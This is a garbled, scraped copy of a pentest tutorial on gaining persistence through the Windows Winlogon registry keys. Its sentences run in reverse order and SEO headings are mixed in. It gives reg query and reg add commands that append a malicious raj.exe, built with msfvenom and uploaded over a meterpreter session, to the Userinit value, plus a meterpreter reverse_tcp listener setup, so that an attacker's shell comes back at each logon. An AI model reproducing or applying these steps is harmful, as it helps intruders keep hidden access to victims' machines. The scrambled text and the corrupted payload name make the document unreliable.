Reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell Then we will be adding the name of the executable in the Registry Value using reg add command. It by default holds the explorer.exe as shown in the given below.Īs we did in the previous practices, we will be gaining a meterpreter session, then we will be transferring the payload over to the Target Machine using the upload command. Now let’s focus on another key that can be used to achieve persistence over the Target Machine. We got our persistence using the Userinit key. Set payload windows/圆4/meterpreter/reverse_tcp Here we can see that we have a persistent shell. The listener should have the same configurations as IP Address and Port that were used in crafting the payload. Although we need to have a listener set up for the session that is generated.
We should be getting a persistent shell as soon as the WinLogon is triggered. Now that we have made the changes in the registry. We can also verify the modification manually here as shown in this image below. We ran the “reg query” command again to ensure that the values are indeed modified. Reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v userinit Reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /d "Userinit.exe, raj.exe" /f Reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit Now using the “reg add” command we modified the key value to hold the malicious executable as well. We see that it has the default value we saw earlier. Since we have the shell of the Target System, we used the “reg query” command to get information about the Userinit Key of WinLogon. After the file is successfully uploaded to the Target Machine, we ran the shell command. We will be using the upload command of the meterpreter for this. Now using the meterpreter session that we already obtained, we transfer this malicious executable to the Target Machine. We created a malicious executable file named raj.exe using the msfvenom tool. Then he uses the meterpreter session to alter the Registry Keys in WinLogon to convert its session into a persistence session. The attacker can use any method of their choice. The scenario that can be related here is that the attacker gains a meterpreter session over the Target Machine here. We will be using these keys to gain persistence over this machine. Now here among a lot of other keys we see that we have keys named Userint and Shell of REG_SZ type. Then Traverse to the following Location: Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon This can be achieved by typing Regedit in the Run Panel. If we want to take a look at the Registry Key Values for WinLogon, we will have to open the Registry Editor.
WINLOGON EXE WINDOWS
But being a Windows Propriety Software, its registry values are located in the HKEY_LOCAL_MACHINE. Now as discussed in the introduction, the WinLogon process controls the HKEY_CURRENT_USER.
IP: 192.168.1.104 Default Registry Key Values Microsoft Official site provides a more detailed, technical list of Winlogon’s responsibilities.
WINLOGON EXE PC
The Windows Logon Application additionally monitors the keyboard and mouse action and is liable for locking your PC and starting screen savers after a time of no activity.
WINLOGON EXE PASSWORD
This combination of keyboard shortcuts is constantly caught by Winlogon, which guarantees you’re signing in on a safe desktop where different programs can’t monitor the password you’re typing or impersonate a sign-in dialog. This is known as the “secure attention sequence”, and it’s why some PCs may be configured to require you to press Ctrl+Alt+Delete before you sign in. Winlogon has special hooks into the system and watches to see if you press Ctrl+Alt+Delete. Hence, each Windows user account is dependent on WinLogon to use the keys under HKEY_CURRENT_USER which is unique for each user account. For example, when you sign in, the Winlogon process is responsible for loading your user profile into the registry. This process performs many important tasks related to the Windows sign-in process. The Winlogon process is a very important part of the Windows operating system, and Windows will be unusable without it. In this article, we are going to describe the ability of the WinLogon process to provide persistent access to the Target Machine.
0 kommentar(er)
